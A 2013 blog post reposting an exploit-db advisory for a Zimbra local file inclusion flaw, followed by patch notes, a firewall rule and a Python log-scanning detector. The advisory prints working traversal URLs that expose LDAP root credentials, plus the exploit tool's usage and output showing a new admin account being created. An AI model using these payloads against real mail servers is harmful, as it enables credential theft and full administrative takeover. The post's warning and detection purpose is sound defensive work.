Sunday, 15 December 2013

Zimbra 0day exploit / Privilege escalation via LFI

Assalamualaikum Wr Wb

Just a reminder for friends whose office or workplace uses a Zimbra mail server.

Zimbra 0day exploit:

# Exploit Title: Zimbra 0day exploit / Privilege escalation via LFI
# Date: 06 Dec 2013
# Exploit Author: rubina119
# Contact Email : rubina119[at]gmail.com
# Vendor Homepage: http://www.zimbra.com/
# Version: 2009, 2010, 2011, 2012 and early 2013 versions are affected.
# Tested on: Centos(x), Ubuntu.
# CVE : No CVE, no patch just 0Day
# State : Critical



# Mirror: http://www.exploit-db.com/sploits/zimbraexploit_rubina119.zip

---------------Description-----------------

This script exploits a Local File Inclusion in
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz
which allows us to see localconfig.xml,
which contains LDAP root credentials that allow us to make requests to the
/service/admin/soap API with the stolen LDAP credentials to create a user
with administration privileges
and gain access to the Administration Console.

LFI is located at:
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

Example:

https://mail.example.com/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml

or

https://mail.example.com:7071/zimbraAdmin/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml


----------------Exploit-----------------


Before using this exploit, the target server must have the admin console port
"7071" open, otherwise it won't work.

Use the exploit like this:


ruby run.rb -t mail.example.com -u someuser -p Test123_23

[*] Looking if host is vuln....
[+] Host is vuln exploiting...
[+] Obtaining Domain Name
[+] Creating Account
[+] Elevating Privileges
[+] Login Credentials
    [*] Login URL : https://mail.example.com:7071/zimbraAdmin/
    [*] Account   : someuser@example.com
    [*] Password  : Test123_23
[+] Successfully Exploited !

The number of vulnerable servers is huge, like 80/100.

This is only for educational purposes.


Source: http://www.exploit-db.com/exploits/30085/

The manual patch guide and information can be seen here, as posted by mas vavai on the Id Zimbra mailing list:

A notification for this issue was published to the Zimbra Support Portal on Feb 26, 2013: https://support.zimbra.com/node/346
Also, a notification was included in these Release Notes:

* 8.0.2 Patch 1: http://files2.zimbra.com/website/docs/8.0/ZCS_Patch_8_0_2_r1.pdf
    o February 19, 2013: Patch 8.0.2 P1 fixes the following bug: Bug 80338 Security Fix
* 7.2.2 Patch 2: http://files2.zimbra.com/website/docs/7.2/ZCS_Patch_7_2_2_r1.pdf
    o February 19, 2013: Patch 7.2.2 P2 fixes the following bug: Bug 80338 Security Fix

Or you can close the Zimbra admin port 7071 on the firewall/iptables side:

iptables -A INPUT -m state --state NEW -p tcp -m tcp --dport 7071 -j DROP
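Patching and closing port 7071 stop future abuse, but a defender will also want to know whether the skin-parameter LFI described above was already probed. The following Python is an added example (not part of the exploit-db advisory, rubina119's tool, or Zimbra itself): it scans combined-format access log lines for requests to the .js.zgz resource bundle whose `skin` value carries a path-traversal sequence, decoding percent-encoding repeatedly so an encoded `..` is still caught. The log format, client addresses and sample lines are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Combined/common access-log format: client, ident, user, [time], "METHOD path PROTO", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# A '..' path component bounded by a slash/backslash or by the start/end of the value
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')

def decode_fully(value, rounds=3):
    """Percent-decode until stable so a double-encoded '%252e%252e' is still recognised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_skin_lfi_probe(request_path):
    """True if the request asks for the .js.zgz bundle with a traversing skin= value."""
    parts = urlsplit(request_path)
    if not parts.path.lower().endswith('.js.zgz'):
        return False
    skins = parse_qs(parts.query, keep_blank_values=True).get('skin', [])
    return any(TRAVERSAL_RE.search(decode_fully(s)) for s in skins)

def scan_access_log(lines):
    """Return (client_ip, timestamp, status, path) for every matching request."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_skin_lfi_probe(m.group('path')):
            hits.append((m.group('ip'), m.group('time'), int(m.group('status')), m.group('path')))
    return hits

# Constructed sample lines (not a real log); 198.51.100.7 reads for localconfig.xml
BUNDLE = '/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450'
SAMPLE_LOG = [
    f'203.0.113.10 - - [15/Dec/2013:10:01:02 +0700] "GET {BUNDLE}&skin=carbon HTTP/1.1" 200 51234',
    f'198.51.100.7 - - [15/Dec/2013:10:02:15 +0700] "GET {BUNDLE}&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml HTTP/1.1" 200 8812',
    f'198.51.100.7 - - [15/Dec/2013:10:02:16 +0700] "GET {BUNDLE}&skin=%252e%252e%252f%252e%252e%252fopt%252fzimbra%252fconf%252flocalconfig.xml HTTP/1.1" 404 0',
    '203.0.113.10 - - [15/Dec/2013:10:03:00 +0700] "GET /zimbra/ HTTP/1.1" 200 2048',
]

if __name__ == '__main__':
    for ip, ts, status, path in scan_access_log(SAMPLE_LOG):
        print(f'{ts} {ip} status={status} {path}')
```

A 200 response to a traversing request is the line worth following up; a legitimate skin name never contains `..`, so the rule produces no hits on normal traffic.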



Wassalamu alaikum, may this serve as a lesson.
